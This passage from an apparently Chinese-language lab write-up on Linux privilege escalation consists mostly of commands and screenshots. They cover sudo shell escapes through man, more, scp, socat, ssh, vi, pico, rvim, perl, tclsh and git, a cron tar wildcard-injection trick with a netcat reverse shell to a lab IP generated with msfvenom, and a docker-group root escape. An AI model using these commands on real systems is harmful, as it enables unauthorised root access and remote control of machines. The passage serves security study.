\/><\/div><\/p>\n<h3>Man(bob)<\/h3>\n<blockquote>\n<p>Linux\u63d0\u4f9b\u4e86\u4e30\u5bcc\u7684\u5e2e\u52a9\u624b\u518c\uff0c\u5f53\u4f60\u9700\u8981\u67e5\u770b\u67d0\u4e2a\u547d\u4ee4\u7684\u53c2\u6570\u65f6\u4e0d\u5fc5\u5230\u5904\u4e0a\u7f51\u67e5\u627e\uff0c\u53ea\u8981man\u4e00\u4e0b\u5373\u53ef\u3002\u53ef\u4ee5\u4f7f\u7528man man \u67e5\u770bman\u7684\u4f7f\u7528\u65b9\u6cd5\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">sudo man man\n!\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151418.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151418.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224230527628\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151419.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151419.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224230545762\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>More(bob)<\/h3>\n<blockquote>\n<p>Linux more \u547d\u4ee4\u7c7b\u4f3c cat \uff0c\u4e0d\u8fc7\u4f1a\u4ee5\u4e00\u9875\u4e00\u9875\u7684\u5f62\u5f0f\u663e\u793a\uff0c\u66f4\u65b9\u4fbf\u4f7f\u7528\u8005\u9010\u9875\u9605\u8bfb\uff0c\u800c\u6700\u57fa\u672c\u7684\u6307\u4ee4\u5c31\u662f\u6309\u7a7a\u767d\u952e\uff08space\uff09\u5c31\u5f80\u4e0b\u4e00\u9875\u663e\u793a\uff0c\u6309 b \u952e\u5c31\u4f1a\u5f80\u56de\uff08back\uff09\u4e00\u9875\u663e\u793a\uff0c\u800c\u4e14\u8fd8\u6709\u641c\u5bfb\u5b57\u4e32\u7684\u529f\u80fd\uff08\u4e0e vi \u76f8\u4f3c\uff09\uff0c\u4f7f\u7528\u4e2d\u7684\u8bf4\u660e\u6587\u4ef6\uff0c\u8bf7\u6309 h \u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">TERM = sudo more \/etc\/profile\n!\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151420.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151420.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224231201762\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Scp(bob)<\/h3>\n<blockquote>\n<p>scp \u662f secure copy \u7684\u7f29\u5199, scp \u662f linux \u7cfb\u7edf\u4e0b\u57fa\u4e8e ssh \u767b\u9646\u8fdb\u884c\u5b89\u5168\u7684\u8fdc\u7a0b\u6587\u4ef6\u62f7\u8d1d\u547d\u4ee4\u3002<\/p>\n<p>scp \u662f\u52a0\u5bc6\u7684\uff0crcp \u662f\u4e0d\u52a0\u5bc6\u7684\uff0cscp \u662f rcp \u7684\u52a0\u5f3a\u7248\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">TF=$(mktemp)\necho &#039;sh 0&lt;&amp;2 1&gt;&amp;2&#039; &gt; $TF\nchmod +x &quot;$TF&quot;\nsudo scp -S $TF x y:<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151421.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151421.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224231450895\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>socat(bob)<\/h3>\n<p><code>socat<\/code>\u662f\u4e00\u4e2a\u591a\u529f\u80fd\u7684\u7f51\u7edc\u5de5\u5177\uff0c\u540d\u5b57\u6765\u7531\u662f<code>Socket CAT<\/code>\uff0c\u53ef\u4ee5\u770b\u4f5c\u662f<code>netcat<\/code>\u7684\u52a0\u5f3a\u7248\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151423.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151423.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224231726189\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u4e5f\u53ef\u4ee5\uff1a<\/p>\n<pre><code class=\"language-shell\">sudo socat TCP-LISTEN:8888,reuseaddr,fork EXEC:\/bin\/sh,pty,stderr,setsid,sigint,sane\nsocat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:8888<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151424.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151424.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224233647333\" \/><\/div><\/p>\n<h3>ssh(bob)<\/h3>\n<pre><code class=\"language-shell\">sudo ssh -o ProxyCommand=&#039;;sh 0&lt;&amp;2 1&gt;&amp;2&#039; x<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151425.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151425.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224233931083\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>vi(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo vi -c &#039;:!\/bin\/sh&#039; \/dev\/null<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151426.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151426.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224234118791\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>zsh(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo zsh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151427.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224234210530\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>pico(bob)<\/h3>\n<blockquote>\n<p>Linux pico\u547d\u4ee4\u7528\u4e8e\u7f16\u8f91\u6587\u5b57\u6587\u4ef6\u3002<\/p>\n<p>pico\u662f\u4e2a\u7b80\u5355\u6613\u7528\u3001\u4ee5\u663e\u793a\u5bfc\u5411\u4e3a\u4e3b\u7684\u6587\u5b57\u7f16\u8f91\u7a0b\u5e8f\uff0c\u5b83\u4f34\u968f\u7740\u5904\u7406\u7535\u5b50\u90ae\u4ef6\u548c\u65b0\u95fb\u7ec4\u7684\u7a0b\u5e8fpine\u800c\u6765\u3002<\/p>\n<\/blockquote>\n<h4>shell1<\/h4>\n<pre><code class=\"language-bash\">pico\n^R^X    # ctrl+R ctrl+X\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151428.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151428.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224234627591\" \/><\/div><\/p>\n<p>\u8fd9\u91cc\u9700\u8981<code>sudo<\/code>\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo pico\n^R^X    # ctrl+R ctrl+X\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151429.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151429.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224235127917\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<h4>shell2<\/h4>\n<pre><code class=\"language-bash\">sudo pico -s \/bin\/sh\n\/bin\/sh\n^T   # ctrl+T<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151430.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151430.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224234703997\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151431.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151431.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224234845566\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>rvim(bob)<\/h3>\n<blockquote>\n<p>\u8fd9\u9700\u8981 rvim \u4f7f\u7528Python\u652f\u6301\u8fdb\u884c\u7f16\u8bd1\u3002\u524d\u7f6e\uff1apy3\u4e3aPython3<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">sudo rvim -c &#039;:python3 import os; os.execl(&quot;\/bin\/sh&quot;, &quot;sh&quot;, &quot;-c&quot;, &quot;reset; exec sh&quot;)&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151432.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151432.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224235236310\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>perl(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo perl -e &#039;exec &quot;\/bin\/sh&quot;;&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151433.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151433.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224235437656\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>tclsh(bob)<\/h3>\n<p><code>tclsh<\/code>\u662fTcl\uff08Tool Command Language\uff09\u7684\u89e3\u91ca\u5668\uff0c\u7528\u4e8e\u6267\u884c Tcl \u811a\u672c\u3002Tcl\u662f\u4e00\u79cd\u901a\u7528\u7684\u811a\u672c\u8bed\u8a00\uff0c\u5b83\u88ab\u8bbe\u8ba1\u7528\u6765\u7f16\u5199\u5404\u79cd\u7c7b\u578b\u7684\u7a0b\u5e8f\uff0c\u5305\u62ec\u7cfb\u7edf\u7ba1\u7406\u811a\u672c\u3001\u56fe\u5f62\u754c\u9762\u7a0b\u5e8f\u3001\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u7b49\u3002Tcl\u811a\u672c\u53ef\u4ee5\u5728\u5404\u79cd\u64cd\u4f5c\u7cfb\u7edf\u4e0a\u8fd0\u884c\uff0c\u5305\u62ecLinux\u3001Unix\u3001Windows\u7b49\u3002<\/p>\n<pre><code class=\"language-bash\">sudo tclsh\nexec \/bin\/sh &lt;@stdin &gt;@stdout 2&gt;@stderr<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151434.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151434.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224235705249\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>git(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo git -p help config\n!\/bin\/sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151435.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151435.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224235931887\" style=\"zoom:67%;\" \/><\/div><\/p>\n<h3>script(bob)<\/h3>\n<pre><code class=\"language-bash\">sudo script -q \/dev\/null<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151436.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151436.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225000108698\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743(bob)<\/h3>\n<pre><code class=\"language-bash\">cat \/etc\/crontab\ncat \/etc\/cron.daily\/backup\necho &quot;mkfifo \/tmp\/sfnirht; nc 192.168.244.128 1234 0&lt;\/tmp\/sfnirht | \/bin\/sh &gt;\/tmp\/sfnirht 2&gt;&amp;1; rm \/tmp\/sfnirht&quot; &gt; shell.sh &amp;&amp; chmod +x shell.sh\necho &gt; &quot;--checkpoint-action=exec=sh shell.sh&quot;\necho &gt; &quot;--checkpoint=1&quot;\n\n# kali\nmsfvenom -p cmd\/unix\/reverse_netcat lhost=192.168.244.128 lport=1234\n# mkfifo \/tmp\/sfnirht; nc 192.168.244.128 1234 0&lt;\/tmp\/sfnirht | \/bin\/sh &gt;\/tmp\/sfnirht 2&gt;&amp;1; rm \/tmp\/sfnirht<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151437.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151437.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225004916435\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>docker\u63d0\u6743(peter)<\/h3>\n<pre><code class=\"language-bash\">groups\npeter docker<\/code><\/pre>\n<pre><code class=\"language-bash\">docker run -v \/:\/mnt --rm -it alpine chroot \/mnt bash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151438.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151438.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240225011855018\" style=\"zoom:50%;\" 